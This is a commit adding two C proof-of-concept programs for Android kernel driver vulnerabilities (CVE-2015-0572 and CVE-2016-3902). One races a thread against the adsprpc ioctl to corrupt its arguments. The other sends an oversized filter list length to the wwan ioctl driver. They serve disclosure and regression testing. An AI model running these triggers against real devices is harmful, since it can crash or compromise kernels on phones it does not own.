PoCs for October Bulletin

Signed-off-by: Scott Bauer <[email protected]>

Author: ScottyBauer

CVE-2015-0572.c

@@ -0,0 +1,127 @@
+/* CVE-2015-0572.c
+ *
+ * October BUlletin:
+ *
+ * https://code.google.com/p/android/issues/detail?id=211546
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <inttypes.h>
+#include <pthread.h>
+
+static const char *dev = "/dev/adsprpc-smd";
+
+typedef uint32_t compat_uint_t;
+typedef uint32_t compat_uptr_t;
+typedef uint64_t __uint128_t;
+
+struct compat_fastrpc_ioctl_invoke {
+        compat_uint_t handle;   /* remote handle */
+        compat_uint_t sc;       /* scalars describing the data */
+        compat_uptr_t pra;      /* remote arguments list */
+};
+
+struct compat_fastrpc_ioctl_invoke_fd {
+        struct compat_fastrpc_ioctl_invoke inv;
+	compat_uptr_t fds;      /* fd list */
+};
+
+struct fastrpc_ioctl_invoke {
+        uint32_t handle;        /* remote handle */
+        uint32_t sc;            /* scalars describing the data */
+        void *pra;      /* remote arguments list */
+	void *pra_2; /* need to make this struct 64 bit compat */
+};
+
+struct fastrpc_ioctl_invoke_fd {
+        struct fastrpc_ioctl_invoke inv;
+        int *fds;               /* fd list */
+	int *fds2;  /* 64 bit ptr */
+};
+
+
+#define COMPAT_FASTRPC_IOCTL_INVOKE_FD \
+	_IOWR('R', 4, struct compat_fastrpc_ioctl_invoke_fd)
+
+
+
+volatile int trigger = 0;
+volatile int trigger1 = 0;
+static void *ptr_change(void *hdr)
+{
+	//void *mal = malloc(4096);
+	volatile unsigned int counter = 0;
+	struct fastrpc_ioctl_invoke_fd test;
+	register int sp asm("sp");
+	//struct fastrpc_ioctl_invoke_fd *fd = sp - sizeof(struct fastrpc_ioctl_invoke_fd);
+	volatile struct fastrpc_ioctl_invoke_fd *fd = hdr;
+	printf("hdr is at %p and sp in thread is %x and test is at %p\n", hdr, sp, &test);
+
+	trigger1 = 1;
+	while (trigger == 0) { };
+	while (trigger != 0) {
+		fd->fds2 = 0x41414141;
+		fd->fds = 0x41414141;
+		fd->inv.sc = 0xbadbeef2;
+		fd->inv.handle = 0xbadbeef;
+		fd->inv.pra = 0xbadbeef0;
+		fd->inv.pra_2 = 0xbadc0de0;
+	}
+        trigger1 = 0;
+	//free(mal);
+	printf("returning pthread\n");
+        return NULL;
+}
+
+void print(volatile char *test) {
+	int i;
+	for (i = 0; i < sizeof(struct fastrpc_ioctl_invoke_fd) + 64; i++)
+		printf("%x ", *(((volatile char *)test) + i));
+
+
+}
+
+static void do_kernel_write(int fd)
+{
+	pthread_t race_car;
+	int counter, i;
+	register int sp asm("sp");
+	struct compat_fastrpc_ioctl_invoke_fd invoke = { 0 };
+	void *ptr = (void*) sp;
+	printf("sp is at %x\n", sp);
+	invoke.inv.sc = 0xFFFFFFFF;
+	invoke.fds = malloc(65535);
+	for (i = 256; i <= 16384+4096; i += sizeof(struct fastrpc_ioctl_invoke_fd)) {
+		printf("%d\n", i);
+		pthread_create(&race_car, NULL, ptr_change, (void *)
+			       ptr - i);
+		while(trigger1 != 1) {}
+		trigger = 1;
+
+		for (counter = 0; counter < 5000; counter++)
+			ioctl(fd, COMPAT_FASTRPC_IOCTL_INVOKE_FD, &invoke);
+		printf("ioctl done\n");
+
+		trigger = 0;
+		pthread_join(race_car, NULL);
+	}
+}
+int main(void) {
+	int fd;
+
+	fd = open(dev, O_RDWR);
+	if (fd < 0) {
+		printf("Couldn't open %s with error %s\n", dev, strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+
+	do_kernel_write(fd);
+
+}

CVE-2016-3902.c

@@ -0,0 +1,91 @@
+/* CVE-2016-3902.c
+ *
+ * October BUlletin
+ *
+ * https://code.google.com/p/android/issues/detail?id=214974
+ *
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdbool.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <net/if.h>
+#include <sys/types.h>
+
+#define IPA_INT_MAX     ((int)(~0U>>1))
+#define IPA_INT_MIN     (-IPA_INT_MAX - 1)
+#define QMI_IPA_MAX_FILTERS_V01 64
+
+struct ipa_filter_handle_to_index_map_v01 {
+        uint32_t filter_handle;
+        uint32_t filter_index;
+};  /* Type */
+
+enum ipa_qmi_result_type_v01 {
+        /* To force a 32 bit signed enum. Do not change or use*/
+        IPA_QMI_RESULT_TYPE_MIN_ENUM_VAL_V01 = IPA_INT_MIN,
+        IPA_QMI_RESULT_SUCCESS_V01 = 0,
+        IPA_QMI_RESULT_FAILURE_V01 = 1,
+        IPA_QMI_RESULT_TYPE_MAX_ENUM_VAL_V01 = IPA_INT_MAX,
+};
+
+
+struct ipa_fltr_installed_notif_req_msg_v01 {
+        uint32_t source_pipe_index;
+        enum ipa_qmi_result_type_v01 install_status;
+        uint32_t filter_index_list_len;
+        struct ipa_filter_handle_to_index_map_v01
+	filter_index_list[QMI_IPA_MAX_FILTERS_V01];
+        uint8_t embedded_pipe_index_valid;
+        uint32_t embedded_pipe_index;
+        uint8_t retain_header_valid;
+        uint8_t retain_header;
+        uint8_t embedded_call_mux_id_valid;
+        uint32_t embedded_call_mux_id;
+        uint8_t num_ipv4_filters_valid;
+        uint32_t num_ipv4_filters;
+        uint8_t num_ipv6_filters_valid;
+        uint32_t num_ipv6_filters;
+        uint8_t start_ipv4_filter_idx_valid;
+        uint32_t start_ipv4_filter_idx;
+        uint8_t start_ipv6_filter_idx_valid;
+        uint32_t start_ipv6_filter_idx;
+};  /* Message */
+
+
+#define WAN_IOC_MAGIC 0x69
+
+#define WAN_IOCTL_ADD_FLT_INDEX         2
+
+#define WAN_IOC_ADD_FLT_RULE_INDEX _IOWR(WAN_IOC_MAGIC, \
+                WAN_IOCTL_ADD_FLT_INDEX, \
+					 struct ipa_fltr_installed_notif_req_msg_v01 *)
+
+
+static const char* dev = "/dev/wwan_ioctl";
+
+int main(void)
+{
+	int fd;
+	struct ipa_fltr_installed_notif_req_msg_v01 msg = { 0 };
+	fd = open(dev, O_RDWR);
+	if (fd < 0) {
+		printf("Failed to open %s with %s\n", dev, strerror(errno));
+		return EXIT_FAILURE;
+	}
+
+	msg.filter_index_list_len = 0xBADC0DE;
+	msg.filter_index_list[0].filter_index = 0; /* technically already set to 0 */
+	/* set the pipe index to fail on the check */
+	msg.source_pipe_index = 0xbeef;
+
+	ioctl(fd, WAN_IOC_ADD_FLT_RULE_INDEX, &msg);
+
+}